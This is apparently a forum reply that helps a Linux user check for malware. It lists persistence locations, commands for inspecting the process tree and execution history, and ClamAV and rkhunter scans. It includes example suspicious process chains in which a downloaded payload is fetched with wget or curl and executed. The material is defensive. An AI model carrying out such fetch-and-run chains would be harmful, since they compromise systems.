Malware will want persistance so let us look into
~/.config/autostart/(XDG autostart entries)~/.bashrc/~/.zshrcinjection- Systemd user services (
~/.config/systemd/user/) - Root-level services (
/etc/systemd/system/) - Cron jobs (
crontab -e,sudo crontab -e) /usr/local/bin/shadow binaries
Anything fishy there? Any cron jobs you dont recognize? Any shadow bins? Anything weird injected into your confs?
What about process Chains? Does anything look strange like parent spawning weird shit that makes no sense to you?
Process tree:
pstree -a -p
Look for wild shit such as:
makepkg→gcc→wget→/tmp/a.out→ runs as rootxdg-open readme.eml→bash→curl <IP>→./payload
History of execution for today
- journalctl _COMM=exe -S today
- ausearch -m execve —success yes
Let us get desperate with AVs/rootkit finders
sudo pacman -S clamavsudo freshclamclamscan -r --bell -i /home /tmp /var/tmpclamscan -r -i / (if you realllly want to check everything)
And rootkit
- sudo pacman -S rkhunter
- sudo rkhunter —update
- sudo rkhunter —check
But if you want my honest take? Its just HTML injection from some janky package that you have. List your installed packages and go thru each one, you 100% have stuff you installed at 4:38AM and just forgot.
Honestly, at this point, save your dot files, nuke it. You WILL spiral from this very hard